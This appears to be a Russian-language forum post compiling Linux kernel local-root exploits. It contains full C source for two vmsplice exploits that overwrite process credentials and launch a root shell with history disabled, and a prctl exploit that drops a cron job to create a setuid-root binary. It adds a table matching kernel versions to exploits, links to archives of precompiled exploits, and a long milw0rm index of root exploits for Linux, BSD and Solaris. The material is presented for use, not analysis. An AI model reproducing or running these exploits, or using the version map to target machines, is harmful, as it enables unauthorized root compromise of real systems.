Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit PHP: /* * diane_lane_fucked_hard.c * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.23 - 2.6.24 */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/uio.h> #define TARGET_PATTERN " sys_vm86old" #define TARGET_SYSCALL 113 #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4) #define TRAMP_CODE (void *) trampoline #define TRAMP_SIZE ( sizeof(trampoline) - 1 ) unsigned char trampoline[] = "\x8b\x5c\x24\x04" /* mov 0x4(%esp),%ebx */ "\x8b\x4c\x24\x08" /* mov 0x8(%esp),%ecx */ "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */ "\x75\x02" /* jne +2 */ "\xff\xd1" /* call *%ecx */ "\xb8\xea\xff\xff\xff" /* mov $-EINVAL,%eax */ "\xc3" /* ret */ ; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } long get_target() { FILE *f; long addr = 0; char line[128]; f = fopen("/proc/kallsyms", "r"); if (!f) die("/proc/kallsyms", errno); while (fgets(line, sizeof(line), f)) { if (strstr(line, TARGET_PATTERN)) { addr = strtoul(line, NULL, 16); break; } } fclose(f); return addr; } static inline __attribute__((always_inline)) void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } } int main(int argc, char *argv[]) { int pi[2]; long addr; struct iovec iov; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); addr = get_target(); printf("[+] addr: 0x%lx\n", addr); if (pipe(pi) < 0) die("pipe", errno); iov.iov_base = (void *) addr; iov.iov_len = TRAMP_SIZE; write(pi[1], TRAMP_CODE, TRAMP_SIZE); _vmsplice(pi[0], &iov, 1, 0); gimmeroot(); if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); return 0; } // milw0rm.com [2008-02-09] Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit PHP: /* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj jakesyk rozbite. * * Linux vmsplice Local Root Exploit * By qaaz * * Linux 2.6.17 - 2.6.24.1 * * This is quite old code and I had to rewrite it to even compile. * It should work well, but I don't remeber original intent of all * the code, so I'm not 100% sure about it. You've been warned ;) * * -static -Wno-format */ #define _GNU_SOURCE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <limits.h> #include <signal.h> #include <unistd.h> #include <sys/uio.h> #include <sys/mman.h> #include <asm/page.h> #define __KERNEL__ #include <asm/unistd.h> #define PIPE_BUFFERS 16 #define PG_compound 14 #define uint unsigned int #define static_inline static inline __attribute__((always_inline)) #define STACK(x) (x + sizeof(x) - 40) struct page { unsigned long flags; int count; int mapcount; unsigned long private; void *mapping; unsigned long index; struct { long next, prev; } lru; }; void exit_code(); char exit_stack[1024 * 1024]; void die(char *msg, int err) { printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err)); fflush(stdout); fflush(stderr); exit(1); } #if defined (__i386__) #ifndef __NR_vmsplice #define __NR_vmsplice 316 #endif #define USER_CS 0x73 #define USER_SS 0x7b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "movl %0, 0x10(%%esp) ;" "movl %1, 0x0c(%%esp) ;" "movl %2, 0x08(%%esp) ;" "movl %3, 0x04(%%esp) ;" "movl %4, 0x00(%%esp) ;" "iret" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movl %%esp, %%eax ;" "andl %1, %%eax ;" "movl (%%eax), %0" : "=r" (curr) : "i" (~8191) ); return (void *) curr; } #elif defined (__x86_64__) #ifndef __NR_vmsplice #define __NR_vmsplice 278 #endif #define USER_CS 0x23 #define USER_SS 0x2b #define USER_FL 0x246 static_inline void exit_kernel() { __asm__ __volatile__ ( "swapgs ;" "movq %0, 0x20(%%rsp) ;" "movq %1, 0x18(%%rsp) ;" "movq %2, 0x10(%%rsp) ;" "movq %3, 0x08(%%rsp) ;" "movq %4, 0x00(%%rsp) ;" "iretq" : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL), "i" (USER_CS), "r" (exit_code) ); } static_inline void * get_current() { unsigned long curr; __asm__ __volatile__ ( "movq %%gs:(0), %0" : "=r" (curr) ); return (void *) curr; } #else #error "unsupported arch" #endif #if defined (_syscall4) #define __NR__vmsplice __NR_vmsplice _syscall4( long, _vmsplice, int, fd, struct iovec *, iov, unsigned long, nr_segs, unsigned int, flags) #else #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl)) #endif static uint uid, gid; void kernel_code() { int i; uint *p = get_current(); for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0]; pages[0]->count = 1; pages[1]->lru.next = (long) kernel_code; /*****/ pages[2] = *(void **) pages[0]; pages[3] = pages[2] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[2]); printf("[+] page: 0x%lx\n", pages[3]); pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2]; pages[2]->count = 1; pages[3]->lru.next = (long) kernel_code; /*****/ pages[4] = *(void **) &(int[2]){PAGE_SIZE,0}; map_size = PAGE_SIZE; map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[4]); /*****/ map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE; map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); /*****/ map_size -= 2 * PAGE_SIZE; if (munmap(map_addr + map_size, PAGE_SIZE) < 0) die("munmap", errno); /*****/ if (pipe(pi) < 0) die("pipe", errno); close(pi[0]); iov.iov_base = map_addr; iov.iov_len = ULONG_MAX; signal(SIGPIPE, exit_code); _vmsplice(pi[1], &iov, 1, 0); die("vmsplice", errno); return 0; } // milw0rm.com [2008-02-09]
[ Обзор уязвимостей Linux Kernel ] Офф.сайт www.linux.org Linux Kernel 2.4.21-grsecure http://packetstormsecurity.nl/0209-exploits/autolinuxconf.tgz Linux Kernel 2.6.13 - 2.6.17.4 Exploit: Code: #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/prctl.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <signal.h> #include <stdlib.h> #include <time.h> #define CROND "/etc/cron.d" #define BUFSIZE 2048 struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; char crontemplate[]= "#/etc/cron.d/core suid_dumpable exploit\n" "SHELL=/bin/sh\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; char cronstring[BUFSIZE]; char fname[BUFSIZE]; struct timeval te; void sh(int sn) { execl(fname, fname, (char *) NULL); } int main(int argc, char *argv[]) { int nw, pid; if (geteuid() == 0) { printf("[+] getting root shell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } } printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); /* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("This is not fatal, rewrite the exploit\n"); } if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Installed signal handler\n"); /* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; } /* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Is you kernel version >= 2.6.13 ?\n"); return 1; } printf("[+] We are suidsafe dumpable!\n"); /* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] Malicious string forged\n"); if ((pid=fork()) == -1) { perror("[-] fork"); return 1; } if (pid == 0) { /* This is not the good way to do it ;) */ sleep(120); exit(0); } /* SEGFAULT the child */ printf("[+] Segfaulting child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120); printf("[-] It looks like the exploit failed\n"); return 1; } Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4) Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) Linux Kernel 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit Linux Kernel 2.4 uselib() Privilege Elevation Exploit Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation Linux Kernel 2.x mremap missing do_munmap Exploit Linux Kernel 2.4.x mremap() bound checking Root Exploit Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working) Linux Kernel < 2.4.20 Module Loader Local Root Exploit Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit (c) (c) (c) zythar: закрепил. плюсануть не могу (*
Kernel List: Code: 2.2.* -> ptrace, ptrace_kmod, kmod 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24, mremap 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.4.29 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit, bluetooth_stack 2.6.5 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.6 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.7 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.8 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.8-5 -> krad2, krad3, h00lyshit, bluetooth_stack 2.6.9 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.9-34 -> r00t, h00lyshit, bluetooth_stack 2.6.10 -> krad, krad2, krad3, h00lyshit, bluetooth_stack 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl 2.6.17 -> jessica_biel_naked_in_my_bed 2.6.24.1 -> jessica_biel_naked_in_my_bed 2.6.23 -> diane_lane_fucked_hard 2.6.24 -> diane_lane_fucked_hard Сайты со скомпиленными сплойтами: http://someshit.net/files/xpl/ http://phpshell.by.ru/exploits/ http://jshooter.by.ru/xpl/ Архив со скомпиленными сплойтами(собраные с сайтов выше каждый сплойт в отдельной папке): http://oneline.ucoz.ru/exploit.tar.gz
милвормовская сборка Code: Linux Common Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3) Linux 2.2.x (on exported files, should be vuln) (http://milw0rm.com/exploits/718) Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160) Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3) Linux 2.4.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895) Linux 2.4.x ->Linux kernel 2.4 uselib() privilege elevation exploit (http://milw0rm.com/exploits/778) Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (http://milw0rm.com/exploits/12) Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (http://milw0rm.com/exploits/131) Linux 2.4.22 ->Linux Kernel 2.4.22 “do_brk()” local Root Exploit (PoC) (http://milw0rm.com/exploits/129) Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160) Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (http://milw0rm.com/exploits/718) Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160) Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (http://milw0rm.com/exploits/1397) Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) (http://milw0rm.com/exploits/2031) Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (http://milw0rm.com/exploits/2011) Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (http://milw0rm.com/exploits/2013) Linux 2.6.x < 2.6.7-rc3 (default configuration) (http://milw0rm.com/exploits/718) Linux 2.6.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895) Debian Debian 2.2 ->/usr/bin/pileup Local Root Exploit (http://milw0rm.com/exploits/1170) Ubuntu Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (http://milw0rm.com/exploits/1579) Slackware Slackware 7.1 ->/usr/bin/Mail Exploit (http://milw0rm.com/exploits/285) Mandrake Mandrake 8.2 -> /usr/mail local exploit (http://milw0rm.com/exploits/40) Mandrake <= 10.2 -> cdrdao Local Root Exploit (http://milw0rm.com/exploits/997) Suse SuSE Linux 9.1 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) SuSE Linux 9.2 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) SuSE Linux 9.3 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) SuSE Linux 10.0 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) SuSE Linux Enterprise Server 8 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) SuSE Linux Enterprise Server 9 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299) BSD Freebsd Freebsd 3.5.1 ->Ports package local root (http://milw0rm.com/exploits/286) Freebsd 4.2 ->Ports package local root (http://milw0rm.com/exploits/286) FreeBSD 4.x <= 5.4) master.passwd Disclosure Exploit (http://milw0rm.com/exploits/1311) Openbsd Openbsd 2.x – 3.3 ->exec_ibcs2_coff_prep_zmagic() Kernel Exploit (http://milw0rm.com/exploits/125) OpenBSD 3.x-4.0 ->vga_ioctl() root exploit (http://milw0rm.com/exploits/3094) Sun-Microsystems Solaris Solaris 2.4 ->lion24.c (http://milw0rm.com/exploits/328) Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182) Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182) Solaris 5.5.1 ->X11R6.3 xterm (http://milw0rm.com/exploits/338) Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182) Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182) Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/714) Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/713) Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/713) Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/714) Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182) Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715) Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182) Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715) Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/714) Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/713) Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715) Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182) Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715) Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182) Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (http://milw0rm.com/exploits/2543) Solaris 10 (libnspr) constructor Local Root Exploit (http://milw0rm.com/exploits/2641) SunOS SunOS 5.10 Generic i86pc i386 i86pc (http://milw0rm.com/exploits/1073) SunOS 5.9 Generic_112233-12 sun4u (http://milw0rm.com/exploits/1073)
